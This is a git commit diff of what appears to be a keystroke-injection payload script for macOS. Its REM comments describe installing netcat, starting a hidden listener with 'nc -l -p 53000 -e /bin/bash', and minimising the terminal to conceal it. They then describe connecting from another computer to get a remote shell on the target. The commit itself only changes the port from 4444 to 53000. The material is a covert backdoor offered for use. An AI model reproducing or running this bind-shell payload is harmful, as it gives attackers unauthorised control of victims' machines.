edits on Port number and added & to end of string

This commit is contained in:
Narstybits
2023-05-29 20:48:56 -05:00
parent 606196cf98
commit 207a325da5
+2 -2
View File
@@ -1,11 +1,11 @@
REM installs netcat using home-brew (can adjust delay)
REM Runs the command nohup nc -l -p 4444 -vvv -e /bin/bash to start a netcat listener on port 53000
REM Runs the command nohup nc -l -p 53000 -vvv -e /bin/bash to start a netcat listener on port 53000
REM clears the terminal
REM Gui m minimizes the terminal window
REM Now on your separate computer in your terminal Run the command 'nc <remote-ip> 4444'
REM Now on your separate computer in your terminal Run the command 'nc <remote-ip> 53000'
REM replacing '<remote-ip>' with the IP address of the target computer.
REM I've noticed that NC does not respond if you copy and paste so please type the I.P. out!
REM If the connection is successful, you should now have a remote shell session on the remote computer.